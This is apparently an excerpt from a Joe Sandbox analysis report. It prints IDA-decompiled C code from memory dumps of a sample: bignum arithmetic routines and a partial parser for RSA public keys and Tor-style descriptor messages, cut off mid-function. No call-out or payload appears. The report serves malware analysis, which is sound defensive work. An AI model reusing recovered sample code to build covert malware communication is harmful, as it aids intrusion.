    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E003A9F4C(unsigned int* __eax, signed int _a4) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				signed short* _t167;
    				unsigned int _t168;
    				signed int _t169;
    				void* _t174;
    				unsigned int _t175;
    				signed int _t176;
    				void* _t178;
    				void* _t179;
    				void* _t180;
    				void* _t181;
    				intOrPtr _t182;
    				signed int _t183;
    				signed int _t184;
    				void* _t186;
    				signed int _t188;
    				signed int _t189;
    				void* _t190;
    				signed int _t192;
    				void* _t194;
    				signed int _t196;
    				signed int _t197;
    				signed int _t198;
    				signed int _t199;
    				signed int _t202;
    				signed int _t203;
    				void* _t204;
    				signed int _t206;
    				signed int _t207;
    				void* _t208;
    				signed int _t210;
    				void* _t212;
    				signed int _t214;
    				signed int _t215;
    				signed int _t216;
    				signed int _t217;
    				signed int _t219;
    				signed int _t220;
    				signed int _t221;
    				signed int _t222;
    				void* _t225;
    				unsigned int _t228;
    				signed int _t229;
    				signed int _t231;
    				signed int _t232;
    				void* _t233;
    				unsigned int _t234;
    				signed int _t235;
    				void* _t237;
    				unsigned int _t240;
    				signed int _t241;
    				signed int _t242;
    				unsigned int _t245;
    				signed int _t246;
    				void* _t247;
    				unsigned int _t250;
    				signed int _t251;
    				void* _t252;
    				unsigned int _t253;
    				signed int _t254;
    				void* _t256;
    				unsigned int _t259;
    				signed int _t260;
    				signed int _t261;
    				intOrPtr _t263;
    				unsigned int _t266;
    				signed int _t267;
    				signed int _t268;
    				intOrPtr _t270;
    				signed int _t272;
    				signed int _t273;
    				signed int _t274;
    				signed int _t276;
    				void* _t279;
    				signed int _t282;
    				signed int _t284;
    				signed int _t287;
    				signed int _t289;
    				signed int _t292;
    				signed int _t294;
    				signed int _t299;
    				signed int _t301;
    				signed int _t304;
    				signed int _t306;
    				void* _t310;
    				void* _t311;
    				intOrPtr _t312;
    				unsigned int _t317;
    				signed int _t318;
    				void* _t319;
    				intOrPtr _t320;
    				unsigned int _t322;
    				signed int _t323;
    				signed int _t324;
    				signed int _t325;
    				void* _t326;
    				signed int _t327;
    				signed int _t328;
    				void* _t329;
    				signed int _t330;
    				signed int _t331;
    				void* _t332;
    				unsigned int _t334;
    				signed int _t335;
    				signed int _t336;
    				signed int _t337;
    				void* _t338;
    				signed int _t339;
    				signed int _t340;
    				void* _t341;
    				signed int _t342;
    
    				_t167 = __eax;
    				_t175 =  *__eax;
    				_t184 = _t175 & 0x0000ffff;
    				_t176 = _t175 >> 0x10;
    				_t228 = _t184 * _t176;
    				_t229 = _t228 << 0x11;
    				_t186 = _t184 * _t184 + _t229;
    				_t178 = _t176 * _t176 + (_t228 >> 0xf);
    				if(_t186 < _t229) {
    					_t178 = _t178 + 1;
    				}
    				 *_a4 = _t186;
    				_t274 = _t167[1] & 0x0000ffff;
    				_t231 = _t167[3] & 0x0000ffff;
    				_v8 = _v8 & 0x00000000;
    				_v16 =  *_t167 & 0x0000ffff;
    				_t188 = _t167[2] & 0x0000ffff;
    				_t189 = _t188 * _v16;
    				_v20 = _t274;
    				_t232 = _t231 * _v20;
    				_t276 = _t231 * _v16;
    				_t317 = _t188 * _t274 + _t276;
    				if(_t317 < _t276) {
    					_t232 = _t232 + 0x10000;
    				}
    				_t318 = _t317 << 0x10;
    				_t190 = _t189 + _t318;
    				_t233 = _t232 + (_t317 >> 0x10);
    				if(_t190 < _t318) {
    					_t233 = _t233 + 1;
    				}
    				_t319 = _t190 + _t178;
    				_t279 = _t233;
    				if(_t319 < _t190) {
    					_t279 = _t233 + 1;
    				}
    				_t320 = _t319 + _t190;
    				if(_t320 < _t190) {
    					_t233 = _t233 + 1;
    				}
    				_t179 = _t279 + _t233;
    				if(_t179 < _t233) {
    					_v8 = 1;
    				}
    				_v12 = _v12 & 0x00000000;
    				 *((intOrPtr*)(_a4 + 4)) = _t320;
    				_t234 = _t167[2];
    				_t192 = _t234 & 0x0000ffff;
    				_t235 = _t234 >> 0x10;
    				_t322 = _t192 * _t235;
    				_t323 = _t322 << 0x11;
    				_t194 = _t192 * _t192 + _t323;
    				_t237 = _t235 * _t235 + (_t322 >> 0xf);
    				if(_t194 < _t323) {
    					_t237 = _t237 + 1;
    				}
    				_t180 = _t179 + _t194;
    				if(_t180 < _t194) {
    					_t237 = _t237 + 1;
    				}
    				_v8 = _v8 + _t237;
    				if(_v8 < _t237) {
    					_v12 = 1;
    				}
    				_t324 = _t167[4] & 0x0000ffff;
    				_t282 = _t167[1] & 0x0000ffff;
    				_v16 =  *_t167 & 0x0000ffff;
    				_t196 = _t167[5] & 0x0000ffff;
    				_t325 = _t324 * _v16;
    				_v20 = _t282;
    				_t197 = _t196 * _v20;
    				_t284 = _t196 * _v16;
    				_t240 = _t324 * _t282 + _t284;
    				if(_t240 < _t284) {
    					_t197 = _t197 + 0x10000;
    				}
    				_t241 = _t240 << 0x10;
    				_t326 = _t325 + _t241;
    				_t198 = _t197 + (_t240 >> 0x10);
    				if(_t326 < _t241) {
    					_t198 = _t198 + 1;
    				}
    				_t181 = _t180 + _t326;
    				_v20 = _t198;
    				_t242 = _t198;
    				if(_t181 < _t326) {
    					_t242 = _t198 + 1;
    				}
    				_v8 = _v8 + _t242;
    				if(_v8 < _t242) {
    					_v12 = _v12 + 1;
    				}
    				_t182 = _t181 + _t326;
    				_t199 = _t198 + 1;
    				if(_t199 >= 0) {
    					_t199 = _v20;
    				}
    				_v8 = _v8 + _t199;
    				if(_v8 < _t199) {
    					_v12 = _v12 + 1;
    				}
    				_v16 = _v16 & 0x00000000;
    				 *((intOrPtr*)(_a4 + 8)) = _t182;
    				_t287 =  *_t167 & 0x0000ffff;
    				_t327 = _t167[6] & 0x0000ffff;
    				_v20 = _t167[1] & 0x0000ffff;
    				_t202 = _t167[7] & 0x0000ffff;
    				_t328 = _t327 * _t287;
    				_v24 = _t287;
    				_t203 = _t202 * _v20;
    				_t289 = _t202 * _v24;
    				_t245 = _t327 * _v20 + _t289;
    				if(_t245 < _t289) {
    					_t203 = _t203 + 0x10000;
    				}
    				_t246 = _t245 << 0x10;
    				_t329 = _t328 + _t246;
    				_t204 = _t203 + (_t245 >> 0x10);
    				if(_t329 < _t246) {
    					_t204 = _t204 + 1;
    				}
    				_v8 = _v8 + _t329;
    				_t247 = _t204;
    				if(_v8 < _t329) {
    					_t247 = _t204 + 1;
    				}
    				_v12 = _v12 + _t247;
    				if(_v12 < _t247) {
    					_v16 = 1;
    				}
    				_v8 = _v8 + _t329;
    				if(_v8 < _t329) {
    					_t204 = _t204 + 1;
    				}
    				_v12 = _v12 + _t204;
    				if(_v12 < _t204) {
    					_v16 = _v16 + 1;
    				}
    				_t292 = _t167[2] & 0x0000ffff;
    				_t330 = _t167[4] & 0x0000ffff;
    				_v20 = _t167[3] & 0x0000ffff;
    				_t206 = _t167[5] & 0x0000ffff;
    				_t331 = _t330 * _t292;
    				_v24 = _t292;
    				_t207 = _t206 * _v20;
    				_t294 = _t206 * _v24;
    				_t250 = _t330 * _v20 + _t294;
    				if(_t250 < _t294) {
    					_t207 = _t207 + 0x10000;
    				}
    				_t251 = _t250 << 0x10;
    				_t332 = _t331 + _t251;
    				_t208 = _t207 + (_t250 >> 0x10);
    				if(_t332 < _t251) {
    					_t208 = _t208 + 1;
    				}
    				_v8 = _v8 + _t332;
    				_t252 = _t208;
    				if(_v8 < _t332) {
    					_t252 = _t208 + 1;
    				}
    				_v12 = _v12 + _t252;
    				if(_v12 < _t252) {
    					_v16 = _v16 + 1;
    				}
    				_v8 = _v8 + _t332;
    				if(_v8 < _t332) {
    					_t208 = _t208 + 1;
    				}
    				_v12 = _v12 + _t208;
    				if(_v12 < _t208) {
    					_v16 = _v16 + 1;
    				}
    				_t183 = _a4;
    				_v8 = _v8 & 0x00000000;
    				 *((intOrPtr*)(_t183 + 0xc)) = _v8;
    				_t253 = _t167[4];
    				_t210 = _t253 & 0x0000ffff;
    				_t254 = _t253 >> 0x10;
    				_t334 = _t210 * _t254;
    				_t335 = _t334 << 0x11;
    				_t212 = _t210 * _t210 + _t335;
    				_t256 = _t254 * _t254 + (_t334 >> 0xf);
    				if(_t212 < _t335) {
    					_t256 = _t256 + 1;
    				}
    				_v12 = _v12 + _t212;
    				if(_v12 < _t212) {
    					_t256 = _t256 + 1;
    				}
    				_v16 = _v16 + _t256;
    				if(_v16 < _t256) {
    					_v8 = 1;
    				}
    				_t299 = _t167[2] & 0x0000ffff;
    				_t336 = _t167[6] & 0x0000ffff;
    				_a4 = _t167[3] & 0x0000ffff;
    				_t214 = _t167[7] & 0x0000ffff;
    				_t337 = _t336 * _t299;
    				_v24 = _t299;
    				_t215 = _t214 * _a4;
    				_t301 = _t214 * _v24;
    				_t259 = _t336 * _a4 + _t301;
    				if(_t259 < _t301) {
    					_t215 = _t215 + 0x10000;
    				}
    				_t260 = _t259 << 0x10;
    				_t338 = _t337 + _t260;
    				_t216 = _t215 + (_t259 >> 0x10);
    				if(_t338 < _t260) {
    					_t216 = _t216 + 1;
    				}
    				_v12 = _v12 + _t338;
    				_a4 = _t216;
    				_t261 = _t216;
    				if(_v12 < _t338) {
    					_t126 = _t216 + 1; // 0x1
    					_t261 = _t126;
    				}
    				_v16 = _v16 + _t261;
    				if(_v16 < _t261) {
    					_v8 = _v8 + 1;
    				}
    				_t263 = _v12 + _t338;
    				_t217 = _t216 + 1;
    				if(_t217 >= 0) {
    					_t217 = _a4;
    				}
    				_v16 = _v16 + _t217;
    				if(_v16 < _t217) {
    					_v8 = _v8 + 1;
    				}
    				_v12 = _v12 & 0x00000000;
    				 *((intOrPtr*)(_t183 + 0x10)) = _t263;
    				_t304 = _t167[4] & 0x0000ffff;
    				_t339 = _t167[6] & 0x0000ffff;
    				_a4 = _t167[5] & 0x0000ffff;
    				_t219 = _t167[7] & 0x0000ffff;
    				_t340 = _t339 * _t304;
    				_v24 = _t304;
    				_t220 = _t219 * _a4;
    				_t306 = _t219 * _v24;
    				_t266 = _t339 * _a4 + _t306;
    				if(_t266 < _t306) {
    					_t220 = _t220 + 0x10000;
    				}
    				_t267 = _t266 << 0x10;
    				_t341 = _t340 + _t267;
    				_t221 = _t220 + (_t266 >> 0x10);
    				if(_t341 < _t267) {
    					_t221 = _t221 + 1;
    				}
    				_v16 = _v16 + _t341;
    				_a4 = _t221;
    				_t268 = _t221;
    				if(_v16 < _t341) {
    					_t155 = _t221 + 1; // 0x1
    					_t268 = _t155;
    				}
    				_t310 = _v8 + _t268;
    				if(_t310 < _t268) {
    					_v12 = 1;
    				}
    				_t270 = _v16 + _t341;
    				_t222 = _t221 + 1;
    				if(_t222 >= 0) {
    					_t222 = _a4;
    				}
    				_t311 = _t310 + _t222;
    				if(_t311 < _t222) {
    					_v12 = _v12 + 1;
    				}
    				 *((intOrPtr*)(_t183 + 0x14)) = _t270;
    				_t168 = _t167[6];
    				_t342 = _t168 & 0x0000ffff;
    				_t169 = _t168 >> 0x10;
    				_t272 = _t342 * _t169;
    				_t225 = _t169 * _t169 + (_t272 >> 0xf);
    				_t273 = _t272 << 0x11;
    				_t174 = _t342 * _t342 + _t273;
    				if(_t174 < _t273) {
    					_t225 = _t225 + 1;
    				}
    				_t312 = _t311 + _t174;
    				if(_t312 < _t174) {
    					_t225 = _t225 + 1;
    				}
    				 *((intOrPtr*)(_t183 + 0x18)) = _t312;
    				 *((intOrPtr*)(_t183 + 0x1c)) = _t225 + _v12;
    				return _t174;
    			}

    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E003A69E7(intOrPtr* __ecx, unsigned int* __edx, signed int _a4) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				intOrPtr _v20;
    				unsigned int _t64;
    				signed int _t67;
    				signed int _t70;
    				intOrPtr _t71;
    				signed int _t72;
    				signed int _t73;
    				void* _t74;
    				void* _t75;
    				intOrPtr _t76;
    				signed int _t77;
    				signed int _t78;
    				void* _t79;
    				void* _t80;
    				intOrPtr _t81;
    				signed int _t82;
    				signed int _t83;
    				void* _t84;
    				void* _t85;
    				intOrPtr _t86;
    				signed int _t89;
    				signed int _t92;
    				intOrPtr _t93;
    				unsigned int* _t95;
    				void* _t96;
    				intOrPtr* _t97;
    				unsigned int _t100;
    				unsigned int _t104;
    				signed int _t105;
    				unsigned int _t106;
    				unsigned int _t110;
    				signed int _t111;
    				intOrPtr _t112;
    				intOrPtr _t113;
    				unsigned int _t114;
    				unsigned int _t118;
    				signed int _t119;
    				signed int _t120;
    				intOrPtr _t121;
    				unsigned int _t122;
    				unsigned int _t126;
    				signed int _t127;
    				intOrPtr _t128;
    				intOrPtr _t129;
    				unsigned int _t130;
    				unsigned int _t134;
    				signed int _t135;
    				signed int _t137;
    				signed int _t138;
    				intOrPtr _t139;
    				signed int _t141;
    				signed int _t145;
    				signed int _t149;
    				signed int _t153;
    				signed int _t154;
    				signed int _t155;
    				signed int _t158;
    				signed int _t159;
    				void* _t160;
    				void* _t161;
    				intOrPtr _t162;
    				signed int _t163;
    				signed int _t164;
    				signed int _t165;
    				signed int _t166;
    				signed int _t167;
    				intOrPtr _t168;
    				signed int _t169;
    				signed int _t170;
    				signed int _t171;
    				signed int _t173;
    				signed int _t174;
    				void* _t175;
    				void* _t176;
    				intOrPtr _t177;
    
    				_t97 = __ecx;
    				_v16 = _v16 & 0x00000000;
    				_t95 = __edx;
    				if(_a4 > 0) {
    					_v8 = _t64 & 0x0000ffff;
    					_v12 = _t64 >> 0x10;
    					while((_a4 & 0xfffffffc) != 0) {
    						_t100 =  *_t95;
    						_t158 = _t100 & 0x0000ffff;
    						_t137 = _t100 >> 0x10;
    						_t159 = _t158 * _v8;
    						_t138 = _t137 * _v12;
    						_t67 = _t137 * _v8;
    						_t104 = _t158 * _v12 + _t67;
    						if(_t104 < _t67) {
    							_t138 = _t138 + 0x10000;
    						}
    						_t105 = _t104 << 0x10;
    						_t160 = _t159 + _t105;
    						_t139 = _t138 + (_t104 >> 0x10);
    						if(_t160 < _t105) {
    							_t139 = _t139 + 1;
    						}
    						_t70 = _v16;
    						_t161 = _t160 + _t70;
    						_v20 = _t139;
    						if(_t161 < _t70) {
    							_v20 = _t139 + 1;
    						}
    						_t71 =  *_t97;
    						_t162 = _t161 + _t71;
    						if(_t162 < _t71) {
    							_v20 = _v20 + 1;
    						}
    						 *_t97 = _t162;
    						_t106 = _t95[1];
    						_t72 = _t106 & 0x0000ffff;
    						_t163 = _t106 >> 0x10;
    						_t73 = _t72 * _v8;
    						_t164 = _t163 * _v12;
    						_t141 = _t163 * _v8;
    						_t110 = _t72 * _v12 + _t141;
    						if(_t110 < _t141) {
    							_t164 = _t164 + 0x10000;
    						}
    						_t111 = _t110 << 0x10;
    						_t74 = _t73 + _t111;
    						_t165 = _t164 + (_t110 >> 0x10);
    						if(_t74 < _t111) {
    							_t165 = _t165 + 1;
    						}
    						_t112 = _v20;
    						_t75 = _t74 + _t112;
    						_v16 = _t165;
    						if(_t75 < _t112) {
    							_v16 = _t165 + 1;
    						}
    						_t113 =  *((intOrPtr*)(_t97 + 4));
    						_t76 = _t75 + _t113;
    						if(_t76 < _t113) {
    							_v16 = _v16 + 1;
    						}
    						 *((intOrPtr*)(_t97 + 4)) = _t76;
    						_t114 = _t95[2];
    						_t77 = _t114 & 0x0000ffff;
    						_t166 = _t114 >> 0x10;
    						_t78 = _t77 * _v8;
    						_t167 = _t166 * _v12;
    						_t145 = _t166 * _v8;
    						_t118 = _t77 * _v12 + _t145;
    						if(_t118 < _t145) {
    							_t167 = _t167 + 0x10000;
    						}
    						_t119 = _t118 << 0x10;
    						_t79 = _t78 + _t119;
    						_t168 = _t167 + (_t118 >> 0x10);
    						if(_t79 < _t119) {
    							_t168 = _t168 + 1;
    						}
    						_t120 = _v16;
    						_t80 = _t79 + _t120;
    						_v20 = _t168;
    						if(_t80 < _t120) {
    							_v20 = _t168 + 1;
    						}
    						_t121 =  *((intOrPtr*)(_t97 + 8));
    						_t81 = _t80 + _t121;
    						if(_t81 < _t121) {
    							_v20 = _v20 + 1;
    						}
    						 *((intOrPtr*)(_t97 + 8)) = _t81;
    						_t122 = _t95[3];
    						_t82 = _t122 & 0x0000ffff;
    						_t169 = _t122 >> 0x10;
    						_t83 = _t82 * _v8;
    						_t170 = _t169 * _v12;
    						_t149 = _t169 * _v8;
    						_t126 = _t82 * _v12 + _t149;
    						if(_t126 < _t149) {
    							_t170 = _t170 + 0x10000;
    						}
    						_t127 = _t126 << 0x10;
    						_t84 = _t83 + _t127;
    						_t171 = _t170 + (_t126 >> 0x10);
    						if(_t84 < _t127) {
    							_t171 = _t171 + 1;
    						}
    						_t128 = _v20;
    						_t85 = _t84 + _t128;
    						if(_t85 < _t128) {
    							_t171 = _t171 + 1;
    						}
    						_t129 =  *((intOrPtr*)(_t97 + 0xc));
    						_t86 = _t85 + _t129;
    						if(_t86 < _t129) {
    							_t171 = _t171 + 1;
    						}
    						 *((intOrPtr*)(_t97 + 0xc)) = _t86;
    						_t95 =  &(_t95[4]);
    						_t97 = _t97 + 0x10;
    						_a4 = _a4 - 4;
    						_v16 = _t171;
    					}
    					if(_a4 == 0) {
    						L48:
    						return _v16;
    					}
    					_t96 = _t95 - _t97;
    					do {
    						_t130 =  *(_t96 + _t97);
    						_t173 = _t130 & 0x0000ffff;
    						_t153 = _t130 >> 0x10;
    						_t174 = _t173 * _v8;
    						_t154 = _t153 * _v12;
    						_t89 = _t153 * _v8;
    						_t134 = _t173 * _v12 + _t89;
    						if(_t134 < _t89) {
    							_t154 = _t154 + 0x10000;
    						}
    						_t135 = _t134 << 0x10;
    						_t175 = _t174 + _t135;
    						_t155 = _t154 + (_t134 >> 0x10);
    						if(_t175 < _t135) {
    							_t155 = _t155 + 1;
    						}
    						_t92 = _v16;
    						_t176 = _t175 + _t92;
    						if(_t176 < _t92) {
    							_t155 = _t155 + 1;
    						}
    						_t93 =  *_t97;
    						_t177 = _t176 + _t93;
    						if(_t177 < _t93) {
    							_t155 = _t155 + 1;
    						}
    						 *_t97 = _t177;
    						_t97 = _t97 + 4;
    						_t60 =  &_a4;
    						 *_t60 = _a4 - 1;
    						_v16 = _t155;
    					} while ( *_t60 != 0);
    					goto L48;
    				}
    				return 0;
    			}

    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E003A6BFB(unsigned int* __ecx, intOrPtr* __edx, signed int _a4) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				intOrPtr _v20;
    				unsigned int _t55;
    				signed int _t58;
    				signed int _t61;
    				signed int _t62;
    				signed int _t63;
    				void* _t64;
    				intOrPtr _t65;
    				signed int _t66;
    				signed int _t67;
    				void* _t68;
    				intOrPtr _t69;
    				signed int _t70;
    				signed int _t71;
    				void* _t72;
    				intOrPtr _t73;
    				signed int _t76;
    				signed int _t79;
    				intOrPtr* _t81;
    				void* _t82;
    				unsigned int _t85;
    				unsigned int _t89;
    				signed int _t90;
    				unsigned int _t91;
    				unsigned int _t95;
    				signed int _t96;
    				intOrPtr _t97;
    				unsigned int _t98;
    				unsigned int _t102;
    				signed int _t103;
    				signed int _t104;
    				unsigned int _t105;
    				unsigned int _t109;
    				signed int _t110;
    				intOrPtr _t111;
    				unsigned int _t112;
    				unsigned int _t116;
    				signed int _t117;
    				signed int _t119;
    				signed int _t120;
    				void* _t121;
    				intOrPtr _t122;
    				signed int _t123;
    				signed int _t124;
    				signed int _t125;
    				signed int _t126;
    				signed int _t127;
    				intOrPtr _t128;
    				signed int _t129;
    				signed int _t130;
    				signed int _t131;
    				signed int _t132;
    				signed int _t133;
    				void* _t134;
    				intOrPtr _t135;
    				signed int _t139;
    				signed int _t140;
    				intOrPtr _t141;
    				signed int _t143;
    				signed int _t147;
    				signed int _t151;
    				signed int _t155;
    				signed int _t156;
    				signed int _t157;
    				unsigned int* _t159;
    
    				_v16 = _v16 & 0x00000000;
    				_t159 = __ecx;
    				_t81 = __edx;
    				if(_a4 > 0) {
    					_v8 = _t55 & 0x0000ffff;
    					_v12 = _t55 >> 0x10;
    					while((_a4 & 0xfffffffc) != 0) {
    						_t85 =  *_t159;
    						_t119 = _t85 & 0x0000ffff;
    						_t139 = _t85 >> 0x10;
    						_t120 = _t119 * _v8;
    						_t140 = _t139 * _v12;
    						_t58 = _t139 * _v8;
    						_t89 = _t119 * _v12 + _t58;
    						if(_t89 < _t58) {
    							_t140 = _t140 + 0x10000;
    						}
    						_t90 = _t89 << 0x10;
    						_t121 = _t120 + _t90;
    						_t141 = _t140 + (_t89 >> 0x10);
    						if(_t121 < _t90) {
    							_t141 = _t141 + 1;
    						}
    						_t61 = _v16;
    						_t122 = _t121 + _t61;
    						_v20 = _t141;
    						if(_t122 < _t61) {
    							_v20 = _t141 + 1;
    						}
    						 *_t81 = _t122;
    						_t91 = _t159[1];
    						_t62 = _t91 & 0x0000ffff;
    						_t123 = _t91 >> 0x10;
    						_t63 = _t62 * _v8;
    						_t124 = _t123 * _v12;
    						_t143 = _t123 * _v8;
    						_t95 = _t62 * _v12 + _t143;
    						if(_t95 < _t143) {
    							_t124 = _t124 + 0x10000;
    						}
    						_t96 = _t95 << 0x10;
    						_t64 = _t63 + _t96;
    						_t125 = _t124 + (_t95 >> 0x10);
    						if(_t64 < _t96) {
    							_t125 = _t125 + 1;
    						}
    						_t97 = _v20;
    						_t65 = _t64 + _t97;
    						_v16 = _t125;
    						if(_t65 < _t97) {
    							_v16 = _t125 + 1;
    						}
    						 *((intOrPtr*)(_t81 + 4)) = _t65;
    						_t98 = _t159[2];
    						_t66 = _t98 & 0x0000ffff;
    						_t126 = _t98 >> 0x10;
    						_t67 = _t66 * _v8;
    						_t127 = _t126 * _v12;
    						_t147 = _t126 * _v8;
    						_t102 = _t66 * _v12 + _t147;
    						if(_t102 < _t147) {
    							_t127 = _t127 + 0x10000;
    						}
    						_t103 = _t102 << 0x10;
    						_t68 = _t67 + _t103;
    						_t128 = _t127 + (_t102 >> 0x10);
    						if(_t68 < _t103) {
    							_t128 = _t128 + 1;
    						}
    						_t104 = _v16;
    						_t69 = _t68 + _t104;
    						_v20 = _t128;
    						if(_t69 < _t104) {
    							_v20 = _t128 + 1;
    						}
    						 *((intOrPtr*)(_t81 + 8)) = _t69;
    						_t105 = _t159[3];
    						_t70 = _t105 & 0x0000ffff;
    						_t129 = _t105 >> 0x10;
    						_t71 = _t70 * _v8;
    						_t130 = _t129 * _v12;
    						_t151 = _t129 * _v8;
    						_t109 = _t70 * _v12 + _t151;
    						if(_t109 < _t151) {
    							_t130 = _t130 + 0x10000;
    						}
    						_t110 = _t109 << 0x10;
    						_t72 = _t71 + _t110;
    						_t131 = _t130 + (_t109 >> 0x10);
    						if(_t72 < _t110) {
    							_t131 = _t131 + 1;
    						}
    						_t111 = _v20;
    						_t73 = _t72 + _t111;
    						if(_t73 < _t111) {
    							_t131 = _t131 + 1;
    						}
    						 *((intOrPtr*)(_t81 + 0xc)) = _t73;
    						_t159 =  &(_t159[4]);
    						_t81 = _t81 + 0x10;
    						_a4 = _a4 - 4;
    						_v16 = _t131;
    					}
    					if(_a4 == 0) {
    						L38:
    						return _v16;
    					}
    					_t82 = _t81 - _t159;
    					do {
    						_t112 =  *_t159;
    						_t132 = _t112 & 0x0000ffff;
    						_t155 = _t112 >> 0x10;
    						_t133 = _t132 * _v8;
    						_t156 = _t155 * _v12;
    						_t76 = _t155 * _v8;
    						_t116 = _t132 * _v12 + _t76;
    						if(_t116 < _t76) {
    							_t156 = _t156 + 0x10000;
    						}
    						_t117 = _t116 << 0x10;
    						_t134 = _t133 + _t117;
    						_t157 = _t156 + (_t116 >> 0x10);
    						if(_t134 < _t117) {
    							_t157 = _t157 + 1;
    						}
    						_t79 = _v16;
    						_t135 = _t134 + _t79;
    						if(_t135 < _t79) {
    							_t157 = _t157 + 1;
    						}
    						 *((intOrPtr*)(_t82 + _t159)) = _t135;
    						_t159 =  &(_t159[1]);
    						_t51 =  &_a4;
    						 *_t51 = _a4 - 1;
    						_v16 = _t157;
    					} while ( *_t51 != 0);
    					goto L38;
    				}
    				return 0;
    			}

    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 59%
    			E003A528D(intOrPtr _a4, signed int* _a8, char* _a12) {
    				signed int _v8;
    				void* _v12;
    				char* _v16;
    				char* _v20;
    				void** _v24;
    				signed int _v28;
    				char* _v32;
    				void* _v36;
    				char _v52;
    				char* _t73;
    				char* _t74;
    				char* _t75;
    				void* _t76;
    				signed int _t78;
    				void* _t79;
    				void* _t84;
    				char* _t87;
    				char* _t91;
    				char* _t94;
    				int _t96;
    				int _t101;
    				intOrPtr _t102;
    				void* _t103;
    				unsigned int _t104;
    				void* _t108;
    				void* _t113;
    				char* _t122;
    				char* _t124;
    				void* _t125;
    				void* _t136;
    				char* _t139;
    				signed int _t140;
    				signed int* _t141;
    				void* _t143;
    				intOrPtr _t150;
    				void* _t158;
    				void* _t159;
    				signed int _t161;
    				void _t173;
    				void _t174;
    				int _t175;
    				void* _t176;
    				signed int _t178;
    				intOrPtr* _t179;
    				void* _t183;
    				intOrPtr _t190;
    				intOrPtr* _t191;
    				char* _t192;
    				void* _t194;
    				void* _t195;
    				void* _t196;
    				void* _t197;
    				void* _t198;
    				void* _t199;
    
    				_t73 = strstr(_a12, "protocol-versions 2,3");
    				_pop(_t143);
    				if(_t73 != 0) {
    					_t74 = strstr(_a12, "-----BEGIN MESSAGE-----\n");
    					_t75 = strstr(_a12, "\n-----END MESSAGE-----");
    					_t196 = _t195 + 0x10;
    					_t136 =  &(_t74[0x18]);
    					if(_t136 == 0 || _t75 == 0) {
    						L35:
    						_t76 = 0;
    						goto L36;
    					} else {
    						_t175 = _t75 - _t136;
    						if(_t175 <= 0) {
    							goto L35;
    						}
    						_t4 = _t175 + 1; // 0x1
    						_t78 = _t4;
    						_v28 = _t78;
    						_t79 =  *0x3b8538(_t78);
    						_v36 = _t79;
    						memcpy(_t79, _t136, _t175);
    						 *((char*)(_v36 + _t175)) = 0;
    						_t176 =  *0x3b8538(_v28);
    						_v32 = _t176;
    						memset(_t176, 0, _v28);
    						_t84 = E003A3933(_v28, _t143, _v36, _t176);
    						_t197 = _t196 + 0x28;
    						if(_t84 == 0) {
    							L34:
    							 *0x3b8540(_v32);
    							 *0x3b8540(_v36);
    							goto L35;
    						}
    						_v8 = _v8 & 0x00000000;
    						_v28 = _v28 & 0x00000000;
    						_t139 = "-----BEGIN RSA PUBLIC KEY-----";
    						_t87 = strstr(_t176 + 1, _t139);
    						if(_t87 == 0) {
    							L27:
    							_t190 = _a4;
    							L28:
    							if(_v8 <= 0) {
    								L31:
    								_t178 = _v28;
    								if(_t178 <= 0) {
    									goto L34;
    								}
    								_t191 = _t190 + 0x1c;
    								do {
    									 *0x3b8540( *_t191);
    									_t191 = _t191 + 0x20;
    									_t178 = _t178 - 1;
    								} while (_t178 != 0);
    								goto L34;
    							}
    							_t140 = _v8;
    							_t179 = _t190 + 0x18;
    							do {
    								 *0x3b8540( *_t179);
    								_t179 = _t179 + 0x20;
    								_t140 = _t140 - 1;
    							} while (_t140 != 0);
    							goto L31;
    						}
    						_t150 = _a4;
    						_v24 = _t150 + 0x1c;
    						_v20 = _t150 + 0x18;
    						while(1) {
    							_v12 = _t87;
    							_t91 = strstr( &(_t87[1]), "-----END RSA PUBLIC KEY-----");
    							_v16 = _t91;
    							if(_t91 == 0) {
    								break;
    							}
    							_t113 =  *0x3b8538(0x1000);
    							 *_v20 = _t113;
    							memset(_t113, 0, 0x1000);
    							memcpy( *_v20, _v12, _v16 - _v12 + 0x1c);
    							_v8 = _v8 + 1;
    							_v20 =  &(_v20[0x20]);
    							_t122 = strstr( &(_v16[1]), _t139);
    							_t197 = _t197 + 0x24;
    							if(_t122 == 0) {
    								break;
    							}
    							_v12 = _t122;
    							_t124 = strstr( &(_t122[1]), "-----END RSA PUBLIC KEY-----");
